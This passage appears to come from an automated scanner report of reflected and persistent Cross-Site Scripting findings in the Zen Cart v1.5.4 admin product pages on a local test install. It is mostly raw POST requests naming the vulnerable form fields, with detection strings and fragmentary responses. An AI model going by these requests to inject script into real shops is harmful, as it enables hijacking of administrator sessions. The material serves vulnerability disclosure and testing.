Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------244472214220682 Content-Disposition: form-data; name="products_status" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------244472214220682 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------244472214220682 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[1]" test -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------244472214220682 Content-Disposition: form-data; name="products_model" testval -----------------------------244472214220682 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------244472214220682 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------244472214220682 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------244472214220682 Content-Disposition: form-data; name="image_delete" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="overwrite" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_image_manual" >"> -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_weight" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="search" test -----------------------------244472214220682-- HTTP Response ----Truncated due to large size --- ger
  • Media Types
  • admin admin $12.00
    " border="0" alt="3ds/>">" title=" 3ds/>"> " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.57567) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------244472214220682 Content-Length: 5014 -----------------------------244472214220682 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="x" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="y" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="master_category" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------244472214220682 Content-Disposition: form-data; name="products_status" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------244472214220682 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------244472214220682 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[1]" test -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------244472214220682 Content-Disposition: form-data; name="products_model" testval -----------------------------244472214220682 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------244472214220682 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------244472214220682 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------244472214220682 Content-Disposition: form-data; name="image_delete" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="overwrite" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[2]" >"> -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_weight" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="search" test -----------------------------244472214220682-- HTTP Response ----Truncated due to large size --- h="100%" cellspacing="0" cellpadding="2">
    admin admin $12.00
    3ds/25Default text
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.27: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_url[1] Injection value: >"> Detection value: alert(14405309.57587) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------244472214220682 Content-Length: 5014 -----------------------------244472214220682 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="x" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="y" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="master_category" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------244472214220682 Content-Disposition: form-data; name="products_status" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------244472214220682 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------244472214220682 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------244472214220682 Content-Disposition: form-data; name="products_description[1]" test -----------------------------244472214220682 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------244472214220682 Content-Disposition: form-data; name="products_model" testval -----------------------------244472214220682 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------244472214220682 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------244472214220682 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------244472214220682 Content-Disposition: form-data; name="image_delete" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="overwrite" 1 -----------------------------244472214220682 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------244472214220682 Content-Disposition: form-data; name="products_url[1]" >"> -----------------------------244472214220682 Content-Disposition: form-data; name="products_weight" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------244472214220682 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------244472214220682 Content-Disposition: form-data; name="search" test -----------------------------244472214220682-- HTTP Response ----Truncated due to large size --- "100%" cellspacing="0" cellpadding="2">
    English admin $12.00
    English admin $12.00
    3ds/25test
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=add_product_attributes&attribute_page=1&products_filter=3 Injected item: POST : attributes_default Injection value: c3p0z14405309.60987r2d2z Reflection URI: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 Detection string: alert(14405309.60987) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------7551144032618 Content-Length: 4987 -----------------------------7551144032618 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------7551144032618 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------7551144032618 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------7551144032618 Content-Disposition: form-data; name="x" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="y" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="master_category" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------7551144032618 Content-Disposition: form-data; name="products_status" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------7551144032618 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------7551144032618 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------7551144032618 Content-Disposition: form-data; name="products_model" testval -----------------------------7551144032618 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------7551144032618 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------7551144032618 Content-Disposition: form-data; name="image_delete" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="overwrite" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------7551144032618 Content-Disposition: form-data; name="products_weight" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="search" test -----------------------------7551144032618 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------7551144032618 Content-Disposition: form-data; name="products_description[2]" -----------------------------7551144032618 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------7551144032618 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------7551144032618 Content-Disposition: form-data; name="products_description[1]" test -----------------------------7551144032618 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------7551144032618 Content-Disposition: form-data; name="products_image" 3ds/25 -----------------------------7551144032618 Content-Disposition: form-data; name="search" test -----------------------------7551144032618-- HTTP Response ----Truncated due to large size --- Model Price/Special/Sale   Quantity    Status Sort Action 
    1 Preview '"--> testval $12.00 1222110   Product is Linked
    0 Finding 3.29: Cross-Site Scripting. Persistent XSS found in current scan. Current injection value: c3p0z1a2a3ar2d2z Injection URI: http://localhost:8081/zen-cart/admin1/attributes_controller.php?action=add_product_attributes&attribute_page=1&products_filter=3 Injected item: POST : product_attribute_is_free Injection value: Reflection URI: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=c3p0z1a2a3ar2d2z&pID=1&action=update_product&page=1 Detection string: alert(14405309.61147) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=c3p0z1a2a3ar2d2z&pID=1&action=update_product&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------7551144032618 Content-Length: 4964 -----------------------------7551144032618 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------7551144032618 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------7551144032618 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------7551144032618 Content-Disposition: form-data; name="x" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="y" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="master_category" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------7551144032618 Content-Disposition: form-data; name="products_status" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------7551144032618 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------7551144032618 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------7551144032618 Content-Disposition: form-data; name="products_model" testval -----------------------------7551144032618 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------7551144032618 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------7551144032618 Content-Disposition: form-data; name="image_delete" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="overwrite" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------7551144032618 Content-Disposition: form-data; name="products_weight" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="search" test -----------------------------7551144032618 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------7551144032618 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------7551144032618 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------7551144032618 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------7551144032618 Content-Disposition: form-data; name="products_description[1]" test -----------------------------7551144032618 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------7551144032618 Content-Disposition: form-data; name="products_image" 3ds/25 -----------------------------7551144032618 Content-Disposition: form-data; name="search" test -----------------------------7551144032618-- HTTP Response ----Truncated due to large size --- Categories / Products Model Price/Special/Sale   Quantity    Status Sort Action 
    1 Preview  testval $12.00 1222110
    Finding 3.30: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_name[1] Injection value: Detection value: alert(14405309.61147) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------7551144032618 Content-Length: 5015 -----------------------------7551144032618 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------7551144032618 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------7551144032618 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------7551144032618 Content-Disposition: form-data; name="x" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="y" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="master_category" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------7551144032618 Content-Disposition: form-data; name="products_status" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------7551144032618 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------7551144032618 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------7551144032618 Content-Disposition: form-data; name="products_model" testval -----------------------------7551144032618 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------7551144032618 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------7551144032618 Content-Disposition: form-data; name="image_delete" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="overwrite" 1 -----------------------------7551144032618 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------7551144032618 Content-Disposition: form-data; name="products_weight" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------7551144032618 Content-Disposition: form-data; name="search" test -----------------------------7551144032618 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------7551144032618 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------7551144032618 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------7551144032618 Content-Disposition: form-data; name="products_name[1]" -----------------------------7551144032618 Content-Disposition: form-data; name="products_description[1]" test -----------------------------7551144032618 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------7551144032618 Content-Disposition: form-data; name="products_image" 3ds/25 -----------------------------7551144032618 Content-Disposition: form-data; name="search" test -----------------------------7551144032618-- HTTP Response ----Truncated due to large size --- nt" align="right"> 
    Quantity    Status Sort Action 
    1 Preview  testval $12.00 1222110
      Product is Linked
    0
    This product was added to our catalog on Tuesday 25 August, 2015.
        Cancel
    Zen Cart:: the art of e-commerce

    E-Commerce Engine Copyright © 2003-2015 Zen Cart®
    Zen Cart v1.5.4/v1.5.4

    Finding 3.32: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_description[2] Injection value: Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------32072267314898 Content-Length: 4975 -----------------------------32072267314898 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="master_category" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------32072267314898 Content-Disposition: form-data; name="products_status" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------32072267314898 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------32072267314898 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[2]" -----------------------------32072267314898 Content-Disposition: form-data; name="products_description[1]" test -----------------------------32072267314898 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------32072267314898 Content-Disposition: form-data; name="products_model" testval -----------------------------32072267314898 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------32072267314898 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------32072267314898 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------32072267314898 Content-Disposition: form-data; name="image_delete" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="overwrite" 1 -----------------------------32072267314898 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------32072267314898 Content-Disposition: form-data; name="products_weight" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:42:30 -----------------------------32072267314898 Content-Disposition: form-data; name="search" test -----------------------------32072267314898 Content-Disposition: form-data; name="x" 0 -----------------------------32072267314898 Content-Disposition: form-data; name="y" 0 -----------------------------32072267314898-- HTTP Response ----Truncated due to large size --- pes
    admin admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
